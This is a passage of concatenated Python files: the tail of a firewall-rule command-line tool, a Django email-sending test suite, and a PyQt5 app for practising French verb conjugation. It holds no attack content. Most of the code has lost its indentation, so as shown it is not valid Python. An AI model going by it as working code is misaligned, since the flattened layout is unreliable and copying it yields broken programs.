dfw_rule_direction=args.dfw_rule_direction, dfw_rule_pktype=args.dfw_rule_pktype,
dfw_rule_disabled=args.dfw_rule_disabled, dfw_rule_action=args.dfw_rule_action,
dfw_rule_source_type=args.dfw_rule_source_type,
dfw_rule_source_name=args.dfw_rule_source_name,
dfw_rule_source_value=args.dfw_rule_source_value,
dfw_rule_source_excluded=args.dfw_rule_source_excluded,
dfw_rule_destination_type=args.dfw_rule_destination_type,
dfw_rule_destination_name=args.dfw_rule_destination_name,
dfw_rule_destination_value=args.dfw_rule_destination_value,
dfw_rule_destination_excluded=args.dfw_rule_destination_excluded,
dfw_rule_service_protocolname=args.dfw_rule_service_protocolname,
dfw_rule_service_destport=args.dfw_rule_service_destport,
dfw_rule_service_srcport=args.dfw_rule_service_srcport,
dfw_rule_service_name=args.dfw_rule_service_name,
dfw_rule_tag=args.dfw_rule_tag, dfw_rule_note=args.dfw_rule_note,
dfw_rule_logged=args.dfw_rule_logged,)
except KeyError as e:
print('Unknown command {}'.format(e))
def main():
main_parser = argparse.ArgumentParser()
subparsers = main_parser.add_subparsers()
contruct_parser(subparsers)
args = main_parser.parse_args()
args.func(args)
if __name__ == "__main__":
main()
# --- src/myapp/tests/test_utils.py (thinkAmi/DjangoCongress_JP_2019_talk) ---
import pathlib
from django.conf import settings
from django.core import mail
from django.core.mail import EmailMessage
from django.test import TestCase
class TestSendMail(TestCase):
def _callFUT(self, encoding='utf-8', has_attachment=False):
from myapp.utils import my_send_mail
my_send_mail(encoding=encoding, has_attachment=has_attachment)
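    # _callFUT invokes the function under test (myapp.utils.my_send_mail, whose
    # implementation is not shown here); during tests Django's locmem email
    # backend collects every sent message in django.core.mail.outbox.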
def test_send_multiple(self):
        # Before any call, the outbox is empty
        self.assertEqual(len(mail.outbox), 0)
        # After one call, there is one message in the outbox
        self._callFUT()
        self.assertEqual(len(mail.outbox), 1)
        # After a second call, there are two messages in the outbox
        self._callFUT()
        self.assertEqual(len(mail.outbox), 2)
def test_types(self):
self._callFUT()
        # The outbox is a list of EmailMessage instances
self.assertTrue(isinstance(mail.outbox, list))
self.assertTrue(isinstance(mail.outbox[0], EmailMessage))
def test_mail_fields(self):
self._callFUT()
actual = mail.outbox[0]
self.assertEqual(actual.subject, '件名')
self.assertEqual(actual.body, '本文')
self.assertEqual(actual.from_email, '差出人 <[email protected]>')
        # Recipient fields are set as lists
self.assertEqual(actual.to,
['送信先1 <[email protected]>',
'送信先2 <[email protected]>'],)
self.assertEqual(actual.cc, ['シーシー <[email protected]>'])
self.assertEqual(actual.bcc, ['ビーシーシー <[email protected]>'])
self.assertEqual(actual.reply_to, ['返信先 <[email protected]>'])
        # The extra headers are included as well
self.assertEqual(actual.extra_headers['Sender'], '[email protected]')
def test_encoding_of_iso2022jp(self):
self._callFUT(encoding='iso-2022-jp')
actual = mail.outbox[0]
        # The EmailMessage itself still stores the subject as utf-8
self.assertEqual(actual.subject, '件名')
def test_attachment(self):
self._callFUT(has_attachment=True)
actual = mail.outbox[0]
self.assertTrue(isinstance(actual.attachments, list))
        # Each attachment is a (filename, content, mimetype) tuple
        self.assertTrue(isinstance(actual.attachments[0], tuple))
        # The attachment content is of type bytes
        self.assertTrue(isinstance(actual.attachments[0][1], bytes))
        # Verify the attachment content itself
img = pathlib.Path(settings.STATICFILES_DIRS[0]).joinpath(
'images', 'shinanogold.png')
with img.open('rb') as f:
expected_img = f.read()
self.assertEqual(actual.attachments[0][1], expected_img)
# --- app.py (luyaozou/conjugaison) ---
#! encoding = utf-8
""" Practice French conjugaison """
import sys
from os.path import isfile
from time import sleep
from sqlite3 import Error as dbError
from PyQt5 import QtWidgets, QtCore
from PyQt5.QtGui import QTextOption, QKeySequence
from dictionary import TENSE_MOODS, PERSONS
from dictionary import conjug, conjug_all
from config import Config, from_json_, to_json
from lang import LANG_PKG
from db import AppDB
class MainWindow(QtWidgets.QMainWindow):
def __init__(self):
super().__init__()
self.setMinimumWidth(600)
self.setMinimumHeight(700)
self.resize(QtCore.QSize(800, 750))
self.config = Config()
if isfile('config.json'):
from_json_(self.config, 'config.json')
self.config.nft = 0
self.config.nfc = 0
self.config.nbt = 0
self.config.nbc = 0
self.setWindowTitle(LANG_PKG[self.config.lang]['main_windowtitle'])
self.setStyleSheet('font-size: {:d}pt'.format(self.config.font_size))
self.db = AppDB('app.db')
centerWidget = QtWidgets.QWidget()
self.box1 = Box1(self.db, self.config, parent=self)
self.box2 = Box2(self.db, self.config, parent=self)
self.box3 = Box3(self.db, self.config, parent=self)
thisLayout = QtWidgets.QVBoxLayout()
thisLayout.setAlignment(QtCore.Qt.AlignHCenter)
thisLayout.setSpacing(10)
thisLayout.addWidget(self.box1)
thisLayout.addWidget(self.box2)
thisLayout.addWidget(self.box3)
centerWidget.setLayout(thisLayout)
# set central widget
self.setCentralWidget(centerWidget)
self.box1.btnCheck.clicked.connect(self.box3.btnClear.click)
self.box2.btnCheck.clicked.connect(self.box3.btnClear.click)
self.box1.btnGen.clicked.connect(self.box3.btnClear.click)
self.box2.btnGen.clicked.connect(self.box3.btnClear.click)
self.box1.btnHelp.clicked.connect(self._slot_help_box1)
self.box2.btnHelp.clicked.connect(self._slot_help_box2)
self.dConfig = DialogConfig(self.config, parent=self)
self.dPref = DialogPref(self.config, parent=self)
self.dAddVoc = DialogAddVoc(self.db, self.config, parent=self)
self.dBrowse = DialogBrowse(self.db, self.config, parent=self)
self.dStats = DialogStats(self.db, self.config, parent=self)
# apply config to dialogs
self.dConfig.set_tense_mood(self.config.enabled_tm_idx)
self.dPref.accepted.connect(self.apply_pref)
menubar = MenuBar(parent=self)
self.setMenuBar(menubar)
self.statusBar = StatusBar(self.config, parent=self)
self.setStatusBar(self.statusBar)
self.statusBar.refresh(*self.db.num_expired_entries(self.config.enabled_tm_idx))
self.box1.sig_checked.connect(lambda: self.statusBar.refresh(
*self.db.num_expired_entries(self.config.enabled_tm_idx)))
self.box2.sig_checked.connect(lambda: self.statusBar.refresh(
*self.db.num_expired_entries(self.config.enabled_tm_idx)))
menubar.actionConfig.triggered.connect(self._config)
menubar.actionPref.triggered.connect(self.dPref.exec)
menubar.actionAddVoc.triggered.connect(self.dAddVoc.exec)
menubar.actionBrowse.triggered.connect(self.dBrowse.exec)
menubar.actionStats.triggered.connect(self.dStats.exec)
self.statusBar.showMessage(LANG_PKG[self.config.lang]['status_bar_msg'],
1000)
self.setDisabled(True)
self.db.check_has_conjug()
self.setDisabled(False)
def _config(self):
# retrieve current checked tense mood pairs
self.dConfig.exec()
if self.dConfig.result() == QtWidgets.QDialog.Accepted:
tm_idx = self.dConfig.get_tense_mood()
if tm_idx:
# apply the new checked tms
self.config.enabled_tm_idx = tm_idx
self.box2.set_tm(self.config.enabled_tm_idx)
self.box3.set_tm(self.config.enabled_tm_idx)
self.statusBar.refresh(*self.db.num_expired_entries(tm_idx))
else:
d = QtWidgets.QMessageBox(
QtWidgets.QMessageBox.Warning,
LANG_PKG[self.config.lang]['config_tm_warning_title'],
LANG_PKG[self.config.lang]['config_tm_warning_body'])
d.exec_()
# resume previous ones
self.dConfig.set_tense_mood(self.config.enabled_tm_idx)
else:
# resume previous ones
self.dConfig.set_tense_mood(self.config.enabled_tm_idx)
@QtCore.pyqtSlot()
def apply_pref(self):
sleep(0.02)
# apply font
self.setStyleSheet('font-size: {:d}pt'.format(self.config.font_size))
# apply language package
self.setWindowTitle(LANG_PKG[self.config.lang]['main_windowtitle'])
self.box1.apply_lang()
self.box2.apply_lang()
self.box3.apply_lang()
self.dPref.apply_lang()
self.dConfig.apply_lang()
self.dAddVoc.apply_lang()
self.dBrowse.apply_lang()
self.dStats.apply_lang()
self.menuBar().apply_lang(LANG_PKG[self.config.lang])
self.statusBar.refresh(*self.db.num_expired_entries(self.config.enabled_tm_idx))
@QtCore.pyqtSlot()
def _slot_help_box1(self):
verb, tense_mood = self.box1.ask_help()
self.box3.editVerb.setText(verb)
self.box3.comboTenseMood.setCurrentText(tense_mood)
self.box1.btnCheck.setDisabled(True)
@QtCore.pyqtSlot()
def _slot_help_box2(self):
verb, tense_mood = self.box2.ask_help()
self.box3.editVerb.setText(verb)
self.box3.comboTenseMood.setCurrentText(tense_mood)
self.box2.btnCheck.setDisabled(True)
def closeEvent(self, ev):
self.db.update_stat(self.config.nft, self.config.nfc,
self.config.nbt, self.config.nbc)
# close database
self.db.close()
# save setting to local file
self.dPref.fetch_config()
to_json(self.config, 'config.json')
class Box1(QtWidgets.QGroupBox):
sig_checked = QtCore.pyqtSignal()
def __init__(self, db, config, parent=None):
super().__init__(parent)
self.db = db
self.config = config
self.setTitle(LANG_PKG[config.lang]['box1_title'])
self._timer = QtCore.QTimer()
self._timer.setSingleShot(True)
self._timer.setInterval(1000)
self._timer.timeout.connect(self._gen)
self.lblVerb = QtWidgets.QLabel()
self.lblVerb.setStyleSheet('font-size: 14pt; color: #2c39cf; font: bold; ')
self.lblTense = QtWidgets.QLabel()
self.lblTense.setFixedWidth(150)
self.lblMood = QtWidgets.QLabel()
self.lblMood.setFixedWidth(150)
self.lblPerson = QtWidgets.QLabel()
self.editInput = QtWidgets.QLineEdit()
self.btnGen = QtWidgets.QPushButton(LANG_PKG[config.lang]['box1_btnGen'])
self.btnCheck = QtWidgets.QPushButton(LANG_PKG[config.lang]['box1_btnCheck'])
self.btnCheck.setToolTip('Shift + Enter')
self.btnCheck.setShortcut(QKeySequence(QtCore.Qt.SHIFT | QtCore.Qt.Key_Return))
self.lblCk = QtWidgets.QLabel()
self.lblCk.setFixedWidth(30)
self.lblExp = QtWidgets.QLabel()
self.lblExp.setSizePolicy(QtWidgets.QSizePolicy.Minimum,
QtWidgets.QSizePolicy.Minimum)
self.btnHelp = QtWidgets.QPushButton(LANG_PKG[config.lang]['box1_btnHelp'])
self.btnHelp.setToolTip('Ctrl + Shift + Enter')
self.btnHelp.setShortcut(QKeySequence(QtCore.Qt.CTRL | QtCore.Qt.SHIFT | QtCore.Qt.Key_Return))
        self._answer = '*'  # avoid matching empty input, which would give a false correct
self._entry_id = -1
self._tm_idx = -1
row1 = QtWidgets.QHBoxLayout()
row1.setAlignment(QtCore.Qt.AlignLeft)
row1.addWidget(self.lblVerb)
row1.addWidget(self.lblExp)
row2 = QtWidgets.QHBoxLayout()
row2.addWidget(self.lblTense)
row2.addWidget(self.lblMood)
row2.addWidget(self.lblPerson)
row2.addWidget(self.editInput)
row2.addWidget(self.lblCk)
row3 = QtWidgets.QHBoxLayout()
row3.setAlignment(QtCore.Qt.AlignRight)
row3.addWidget(self.btnGen)
row3.addWidget(self.btnCheck)
row3.addWidget(self.btnHelp)
thisLayout = QtWidgets.QVBoxLayout()
thisLayout.setSpacing(10)
thisLayout.setAlignment(QtCore.Qt.AlignHCenter)
thisLayout.addLayout(row1)
thisLayout.addLayout(row2)
thisLayout.addLayout(row3)
self.setLayout(thisLayout)
self.btnGen.clicked.connect(self._gen)
self.btnCheck.clicked.connect(self._ck)
def _gen(self):
""" Generate a verb & a conjugaison """
# clear previous result
self.lblCk.clear()
self.editInput.clear()
# draw random verb until there is a valid conjugation
# this is to avoid those few special verbs that do not have full conjug.
try:
while True:
# every <retry_intvl> practices, retrieve the verb with
# maximum incorrect number and try again
if not (self.config.nft % self.config.retry_intvl):
entry_id, verb, explanation, tm_idx, pers_idx = self.db.choose_verb(
'practice_forward', self.config.enabled_tm_idx,
order='correct_num ASC')
else: # randomly select a verb
entry_id, verb, explanation, tm_idx, pers_idx = self.db.choose_verb(
'practice_forward', self.config.enabled_tm_idx)
tense, mood = TENSE_MOODS[tm_idx]
answer = conjug(verb, tense, mood, pers_idx)
if answer:
self.lblVerb.setText(verb)
self.lblExp.setText(explanation)
self.lblPerson.setText(PERSONS[pers_idx])
                    if mood != 'impératif':
                        self.editInput.setText(PERSONS[pers_idx])
self.lblTense.setText(tense)
self.lblMood.setText(mood)
self.editInput.setFocus()
self._answer = answer
self._entry_id = entry_id
self._tm_idx = tm_idx
self.config.nft += 1 # add 1 to n total forward
self.btnCheck.setDisabled(False)
break
except ValueError as err:
d = QtWidgets.QMessageBox(
QtWidgets.QMessageBox.Critical,
LANG_PKG[self.config.lang]['msg_error_title'], str(err))
d.exec_()
except TypeError:
d = QtWidgets.QMessageBox(
QtWidgets.QMessageBox.Warning,
LANG_PKG[self.config.lang]['msg_warning_title'],
LANG_PKG[self.config.lang]['msg_warning_no_entry'])
d.exec_()
except KeyError as err:
d = QtWidgets.QMessageBox(
QtWidgets.QMessageBox.Warning,
LANG_PKG[self.config.lang]['msg_warning_title'],
LANG_PKG[self.config.lang]['msg_warning_no_config'].format(str(err))
)
d.exec_()
def _ck(self):
""" Check the answer """
txt = self.editInput.text()
# remove extra spaces and only put 1
txt_striped = ' '.join(txt.split())
if txt_striped == self._answer:
self.lblCk.setText('✓')
self.lblCk.setStyleSheet('font-size: 14pt; font: bold; color: #009933')
self.config.nfc += 1
self._timer.start()
else:
self.lblCk.setText('🞪')
self.lblCk.setStyleSheet('font-size: 14pt; font: bold; color: #D63333')
try:
self.db.update_res('practice_forward', self._entry_id, txt_striped == self._answer)
self.sig_checked.emit()
except TypeError:
d = QtWidgets.QMessageBox(
QtWidgets.QMessageBox.Warning,
LANG_PKG[self.config.lang]['msg_warning_title'],
LANG_PKG[self.config.lang]['msg_warning_no_entry']
)
d.exec_()
def ask_help(self):
return self.lblVerb.text(), ', '.join(TENSE_MOODS[self._tm_idx])
def apply_lang(self):
self.setTitle(LANG_PKG[self.config.lang]['box1_title'])
self.btnGen.setText(LANG_PKG[self.config.lang]['box1_btnGen'])
self.btnCheck.setText(LANG_PKG[self.config.lang]['box1_btnCheck'])
self.btnHelp.setText(LANG_PKG[self.config.lang]['box1_btnHelp'])
class Box2(QtWidgets.QGroupBox):
sig_checked = QtCore.pyqtSignal()
def __init__(self, db, config, parent=None):
super().__init__(parent)
self.db = db
self.config = config
self.setTitle(LANG_PKG[config.lang]['box2_title'])
self._timer = QtCore.QTimer()
self._timer.setSingleShot(True)
self._timer.setInterval(1000)
self._timer.timeout.connect(self._gen)
self.btnGen = QtWidgets.QPushButton(LANG_PKG[config.lang]['box2_btnGen'])
self.btnCheck = QtWidgets.QPushButton(LANG_PKG[config.lang]['box2_btnCheck'])
self.btnCheck.setToolTip('Alt + Enter')
self.btnCheck.setShortcut(QKeySequence(QtCore.Qt.ALT | QtCore.Qt.Key_Return))
self.btnHelp = QtWidgets.QPushButton(LANG_PKG[config.lang]['box2_btnHelp'])
self.btnHelp.setToolTip('Shift + Alt + Enter')
self.btnHelp.setShortcut(QKeySequence(QtCore.Qt.SHIFT | QtCore.Qt.ALT | QtCore.Qt.Key_Return))
self.editVerb = QtWidgets.QLineEdit()
self.comboTenseMood = QtWidgets.QComboBox()
self.comboTenseMood.setFixedWidth(300)
self.set_tm(self.config.enabled_tm_idx)
self.lblCk = QtWidgets.QLabel()
self.lblCk.setFixedWidth(30)
self.lblConjug = QtWidgets.QLabel()
self.lblConjug.setStyleSheet('font-size: 14pt; color: #2c39cf; font: bold; ')
self.lblAns = QtWidgets.QLabel()
self.lblAns.setSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
self.btnGen.clicked.connect(self._gen)
self.btnCheck.clicked.connect(self._ck)
row2 = QtWidgets.QHBoxLayout()
self.lblInf = QtWidgets.QLabel(LANG_PKG[config.lang]['box2_lblInf'])
row2.addWidget(self.lblInf)
row2.addWidget(self.editVerb)
row2.addWidget(self.comboTenseMood)
row2.addWidget(self.lblCk)
row3 = QtWidgets.QHBoxLayout()
row3.setAlignment(QtCore.Qt.AlignRight)
row3.addWidget(self.lblAns)
row3.addWidget(self.btnGen)
row3.addWidget(self.btnCheck)
row3.addWidget(self.btnHelp)
thisLayout = QtWidgets.QVBoxLayout()
thisLayout.setAlignment(QtCore.Qt.AlignHCenter)
thisLayout.setSpacing(10)
thisLayout.addWidget(self.lblConjug)
thisLayout.addLayout(row2)
thisLayout.addLayout(row3)
self.setLayout(thisLayout)
self.editVerb.editingFinished.connect(self.comboTenseMood.setFocus)
        self._answer = '*'  # avoid matching an empty string, which would give a false correct
self._entry_id = -1
self._tm_idx = -1
def set_tm(self, checked_tm_idx):
""" set tense mood options """
self.comboTenseMood.clear()
self.comboTenseMood.addItems([', '.join(TENSE_MOODS[i]) for i in checked_tm_idx])
self.comboTenseMood.adjustSize()
def _gen(self):
""" Generate a conjugaison """
# clear previous result
self.lblCk.clear()
self.editVerb.clear()
# draw random verb until there is a valid conjugation
# this is to avoid those few special verbs that do not have full conjug.
try:
while True:
# every <retry_intvl> practices, retrieve the verb with
# maximum incorrect number and try again
if not (self.config.nbt % self.config.retry_intvl):
entry_id, verb, explanation, tm_idx, pers_idx = self.db.choose_verb(
'practice_backward', self.config.enabled_tm_idx,
order='correct_num ASC')
else: # randomly select a verb
entry_id, verb, explanation, tm_idx, pers_idx = self.db.choose_verb(
'practice_backward', self.config.enabled_tm_idx)
tense, mood = TENSE_MOODS[tm_idx]
conjug_str = conjug(verb, tense, mood, pers_idx)
if conjug_str:
self.lblConjug.setText(conjug_str)
self.lblAns.clear()
self.editVerb.setFocus()
self._answer = verb
self._entry_id = entry_id
self._tm_idx = tm_idx
self.config.nbt += 1 # add 1 to n total forward
self.btnCheck.setDisabled(False)
break
except ValueError as err:
d = QtWidgets.QMessageBox(
QtWidgets.QMessageBox.Critical,
LANG_PKG[self.config.lang]['msg_error_title'], str(err))
d.exec_()
except TypeError:
d = QtWidgets.QMessageBox(
QtWidgets.QMessageBox.Warning,
LANG_PKG[self.config.lang]['msg_warning_title'],
LANG_PKG[self.config.lang]['msg_warning_no_entry'])
d.exec_()
except KeyError as err:
d = QtWidgets.QMessageBox(
QtWidgets.QMessageBox.Warning,
LANG_PKG[self.config.lang]['msg_warning_title'],
LANG_PKG[self.config.lang]['msg_warning_no_config'].format(str(err))
)
d.exec_()
def _ck(self):
""" Check the answer """
is_correct = self.editVerb.text().lower() == self._answer and \
self.comboTenseMood.currentText() == ', '.join(TENSE_MOODS[self._tm_idx])
if is_correct:
self.lblCk.setText('✓')
self.lblCk.setStyleSheet('font-size: 14pt; color: #009933')
self.config.nbc += 1
self._timer.start(1000)
else:
self.lblCk.setText('🞪')
self.lblCk.setStyleSheet('font-size: 14pt; color: #D63333')
self.lblAns.setText(' '.join((self._answer,) + TENSE_MOODS[self._tm_idx]))
self.btnCheck.setDisabled(True)
self._timer.start(5000)
try:
self.db.update_res('practice_backward', self._entry_id, is_correct)
self.sig_checked.emit()
except TypeError:
d = QtWidgets.QMessageBox(
QtWidgets.QMessageBox.Warning,
LANG_PKG[self.config.lang]['msg_warning_title'],
LANG_PKG[self.config.lang]['msg_warning_no_entry']
)
d.exec_()
def ask_help(self):
return self._answer, ', '.join(TENSE_MOODS[self._tm_idx])
def apply_lang(self):
self.setTitle(LANG_PKG[self.config.lang]['box2_title'])
self.btnGen.setText(LANG_PKG[self.config.lang]['box2_btnGen'])
self.btnCheck.setText(LANG_PKG[self.config.lang]['box2_btnCheck'])
self.btnHelp.setText(LANG_PKG[self.config.lang]['box2_btnHelp'])
self.lblInf.setText(LANG_PKG[self.config.lang]['box2_lblInf'])
class Box3(QtWidgets.QGroupBox):
def __init__(self, db, config, parent=None):
super().__init__(parent)
self.config = config
self.db = db
self.setTitle(LANG_PKG[config.lang]['box3_title'])
self.editVerb = QtWidgets.QLineEdit()
self.comboTenseMood = QtWidgets.QComboBox()
self.comboTenseMood.setFixedWidth(300)
self.comboTenseMood.addItems([', '.join(TENSE_MOODS[i]) for i in config.enabled_tm_idx])
self.btnClear = QtWidgets.QPushButton(LANG_PKG[config.lang]['box3_btnClear'])
self.lblExp = QtWidgets.QLabel()
self.lblExp.setWordWrap(True)
self.lblExp.setSizePolicy(QtWidgets.QSizePolicy.Minimum,
QtWidgets.QSizePolicy.Minimum)
self.lblResult = QtWidgets.QTextEdit()
self.lblResult.setTextInteractionFlags(QtCore.Qt.TextEditorInteraction)
self.lblResult.setReadOnly(True)
self.btnClear.clicked.connect(self._clear)
self.editVerb.editingFinished.connect(self._search)
self.comboTenseMood.currentIndexChanged.connect(self._search)
row1 = QtWidgets.QHBoxLayout()
row1.addWidget(self.editVerb)
row1.addWidget(self.comboTenseMood)
row1.addWidget(self.btnClear)
thisLayout = QtWidgets.QVBoxLayout()
thisLayout.addLayout(row1)
thisLayout.addWidget(self.lblExp)
thisLayout.addWidget(self.lblResult)
self.setLayout(thisLayout)
def set_tm(self, checked_tm_idx):
""" set tense mood options """
self.comboTenseMood.clear()
self.comboTenseMood.addItems([', '.join(TENSE_MOODS[i]) for i in checked_tm_idx])
def _search(self):
try:
verb = self.editVerb.text().strip()
tense, mood = self.comboTenseMood.currentText().split(', ')
self.lblResult.clear()
self.lblResult.setText('\n'.join(conjug_all(verb, tense, mood)))
self.lblExp.setText(self.db.get_explanation(verb))
except (KeyError, TypeError):
self.lblResult.clear()
self.lblExp.clear()
except (ValueError, IndexError) as err:
self.lblResult.setText(str(err))
self.lblExp.clear()
except dbError:
self.lblResult.setText(LANG_PKG[self.config.lang]['box3_db_error'])
self.lblExp.clear()
def _clear(self):
self.editVerb.clear()
self.lblExp.clear()
self.lblResult.clear()
def apply_lang(self):
self.setWindowTitle(LANG_PKG[self.config.lang]['box3_title'])
self.btnClear.setText(LANG_PKG[self.config.lang]['box3_btnClear'])
class DialogConfig(QtWidgets.QDialog):
def __init__(self, config, parent=None):
super().__init__(parent)
self.config = config
ckLayout = QtWidgets.QVBoxLayout()
self._cklist = []
for i, _tm in enumerate(TENSE_MOODS):
ck = QtWidgets.QCheckBox(", ".join(_tm))
self._cklist.append(ck)
ckLayout.addWidget(ck)
btnLayout = QtWidgets.QHBoxLayout()
btnLayout.setAlignment(QtCore.Qt.AlignRight)
self.btnOk = QtWidgets.QPushButton('Okay')
self.btnCancel = QtWidgets.QPushButton("Cancel")
btnLayout.addWidget(self.btnCancel)
btnLayout.addWidget(self.btnOk)
self.apply_lang()
thisLayout = QtWidgets.QVBoxLayout()
thisLayout.addLayout(ckLayout)
thisLayout.addLayout(btnLayout)
self.setLayout(thisLayout)
self.btnCancel.clicked.connect(self.reject)
self.btnOk.clicked.connect(self.accept)
def get_tense_mood(self):
checked_tense_moods = []
for i, ck in enumerate(self._cklist):
if ck.isChecked():
checked_tense_moods.append(i)
return checked_tense_moods
def set_tense_mood(self, tm_idx):
for i, ck in enumerate(self._cklist):
if ck.isEnabled():
ck.setChecked(i in tm_idx)
def apply_lang(self):
self.setWindowTitle(LANG_PKG[self.config.lang]['dialog_config_title'])
self.btnOk.setText(LANG_PKG[self.config.lang]['btnOK'])
self.btnCancel.setText(LANG_PKG[self.config.lang]['btnCancel'])
class DialogPref(QtWidgets.QDialog):
def __init__(self, config, parent=None):
super().__init__(parent)
self.config = config
self.setWindowTitle('Configure Preferences')
self.lblIntvl = QtWidgets.QLabel()
self.inpIntvl = QtWidgets.QSpinBox()
self.inpIntvl.setMinimum(1)
self.inpIntvl.setValue(config.retry_intvl)
self.lblLang = QtWidgets.QLabel()
self.lblFontSize = QtWidgets.QLabel()
self.inpFontSize = QtWidgets.QSpinBox()
self.inpFontSize.setMinimum(10)
self.inpFontSize.setSuffix(' pt')
self.inpFontSize.setValue(config.font_size)
self.comboLang = QtWidgets.QComboBox()
self.comboLang.addItems(list(LANG_PKG.keys()))
self.comboLang.setCurrentText(config.lang)
prefLayout = QtWidgets.QFormLayout()
prefLayout.addRow(self.lblIntvl, self.inpIntvl)
prefLayout.addRow(self.lblLang, self.comboLang)
prefLayout.addRow(self.lblFontSize, self.inpFontSize)
btnLayout = QtWidgets.QHBoxLayout()
btnLayout.setAlignment(QtCore.Qt.AlignRight)
self.btnOk = QtWidgets.QPushButton('Okay')
self.btnCancel = QtWidgets.QPushButton("Cancel")
self.btnOk.setDefault(True)
btnLayout.addWidget(self.btnCancel)
btnLayout.addWidget(self.btnOk)
self.apply_lang()
thisLayout = QtWidgets.QVBoxLayout()
thisLayout.addLayout(prefLayout)
thisLayout.addLayout(btnLayout)
self.setLayout(thisLayout)
self.btnCancel.clicked.connect(self.reject)
self.btnOk.clicked.connect(self.accept)
self.accepted.connect(self.fetch_config)
def fetch_config(self):
self.config.lang = list(LANG_PKG.keys())[self.comboLang.currentIndex()]
self.config.retry_intvl = self.inpIntvl.value()
self.config.font_size = self.inpFontSize.value()
def apply_lang(self):
self.setWindowTitle(LANG_PKG[self.config.lang]['dialog_pref_title'])
self.lblIntvl.setText(LANG_PKG[self.config.lang]['dialog_pref_lblIntvl'])
self.lblIntvl.setToolTip(LANG_PKG[self.config.lang]['dialog_pref_lblIntvl_tooltip'])
self.lblLang.setText(LANG_PKG[self.config.lang]['dialog_pref_lblLang'])
self.lblFontSize.setText(LANG_PKG[self.config.lang]['dialog_pref_lblFont'])
current_idx = self.comboLang.currentIndex()
self.comboLang.clear()
self.comboLang.addItems(LANG_PKG[self.config.lang]['dialog_pref_comboLang'])
self.comboLang.setCurrentIndex(current_idx)
self.btnOk.setText(LANG_PKG[self.config.lang]['btnOK'])
self.btnCancel.setText(LANG_PKG[self.config.lang]['btnCancel'])
class DialogAddVoc(QtWidgets.QDialog):
def __init__(self, db, config, parent=None):
super().__init__(parent)
self.db = db
self.config = config
self.btnAdd = QtWidgets.QPushButton('Add')
self.btnCancel = QtWidgets.QPushButton('Cancel')
self.btnUpdate = QtWidgets.QPushButton('Update')
self.editVerb = QtWidgets.QLineEdit()
self.editExp = QtWidgets.QTextEdit()
self.editExp.setWordWrapMode(QTextOption.WordWrap)
self.editExp.setTextInteractionFlags(QtCore.Qt.TextEditorInteraction)
self.btnAdd.setDefault(True)
self.btnUpdate.setAutoDefault(True)
btnLayout = QtWidgets.QHBoxLayout()
btnLayout.setAlignment(QtCore.Qt.AlignRight)
btnLayout.addWidget(self.btnCancel)
btnLayout.addWidget(self.btnUpdate)
btnLayout.addWidget(self.btnAdd)
self.btnAdd.clicked.connect(self._add)
self.btnCancel.clicked.connect(self.reject)
self.btnUpdate.clicked.connect(self._update)
self.editVerb.editingFinished.connect(self._check_exist)
self.lblVerb = QtWidgets.QLabel('Verb')
self.lblExp = QtWidgets.QLabel('Explanation')
thisLayout = QtWidgets.QVBoxLayout()
thisLayout.addWidget(self.lblVerb)
thisLayout.addWidget(self.editVerb)
thisLayout.addWidget(self.lblExp)
thisLayout.addWidget(self.editExp)
thisLayout.addLayout(btnLayout)
self.setLayout(thisLayout)
self.apply_lang()
def _add(self):
verb = self.editVerb.text().strip()
explanation = self.editExp.toPlainText().strip()
self.db.add_voc(verb, explanation)
self.editVerb.clear()
self.editExp.clear()
def _update(self):
verb = self.editVerb.text().strip()
explanation = self.editExp.toPlainText().strip()
self.db.update_voc(verb, explanation)
self.editVerb.clear()
self.editExp.clear()
def _check_exist(self):
verb = self.editVerb.text().strip()
is_exist = self.db.check_exist(verb)
if is_exist:
self.btnAdd.setDisabled(True)
self.btnUpdate.setDisabled(False)
self.editExp.setText(self.db.get_explanation(verb))
else:
self.btnAdd.setDisabled(False)
self.btnUpdate.setDisabled(True)
self.editExp.clear()
def apply_lang(self):
self.setWindowTitle(LANG_PKG[self.config.lang]['dialog_addvoc_title'])
self.btnAdd.setText(LANG_PKG[self.config.lang]['dialog_addvoc_btnAdd'])
self.btnCancel.setText(LANG_PKG[self.config.lang]['dialog_addvoc_btnCancel'])
self.btnUpdate.setText(LANG_PKG[self.config.lang]['dialog_addvoc_btnUpdate'])
self.lblVerb.setText(LANG_PKG[self.config.lang]['dialog_addvoc_lblVerb'])
self.lblExp.setText(LANG_PKG[self.config.lang]['dialog_addvoc_lblExp'])
class DialogBrowse(QtWidgets.QDialog):
def __init__(self, db, config, parent=None):
super().__init__(parent)
self.db = db
self.config = config
self.setWindowTitle(LANG_PKG[config.lang]['dialog_browse_title'])
self.setWindowFlags(QtCore.Qt.Window)
self.setMinimumWidth(900)
self.resize(QtCore.QSize(900, 600))
self.setModal(False)
self.btnRefresh = QtWidgets.QPushButton(LANG_PKG[config.lang]['dialog_browse_btnRefresh'])
self.btnRefresh.clicked.connect(self._refresh)
btnLayout = QtWidgets.QHBoxLayout()
btnLayout.setAlignment(QtCore.Qt.AlignRight)
btnLayout.addWidget(self.btnRefresh)
self.dbTable = QtWidgets.QTableWidget()
area = QtWidgets.QScrollArea()
area.setWidget(self.dbTable)
area.setWidgetResizable(True)
area.setAlignment(QtCore.Qt.AlignTop)
thisLayout = QtWidgets.QVBoxLayout()
thisLayout.addWidget(area)
thisLayout.addLayout(btnLayout)
self.setLayout(thisLayout)
self._refresh()
def _refresh(self):
self.dbTable.clearContents()
records = self.db.get_glossary()
rows = len(records)
self.dbTable.setRowCount(rows)
self.dbTable.setColumnCount(2)
for row, rec in enumerate(records):
for col, x in enumerate(rec):
item = QtWidgets.QTableWidgetItem(str(x))
self.dbTable.setItem(row, col, item)
self.dbTable.resizeRowsToContents()
self.dbTable.resizeColumnsToContents()
def apply_lang(self):
self.setWindowTitle(LANG_PKG[self.config.lang]['dialog_browse_title'])
self.btnRefresh.setText(LANG_PKG[self.config.lang]['dialog_browse_btnRefresh'])
class DialogStats(QtWidgets.QDialog):
def __init__(self, db, config, parent=None):
super().__init__(parent)
self.db = db
self.config = config
self.lbl = QtWidgets.QLabel()
self.lbl.setWordWrap(True)
self.lbl.setSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)
thisLayout = QtWidgets.QVBoxLayout()
thisLayout.addWidget(self.lbl)
self.setLayout(thisLayout)
def showEvent(self, ev):
self.lbl.setText(self.db.get_stats())
def apply_lang(self):
self.setWindowTitle(LANG_PKG[self.config.lang]['dialog_stats_title'])
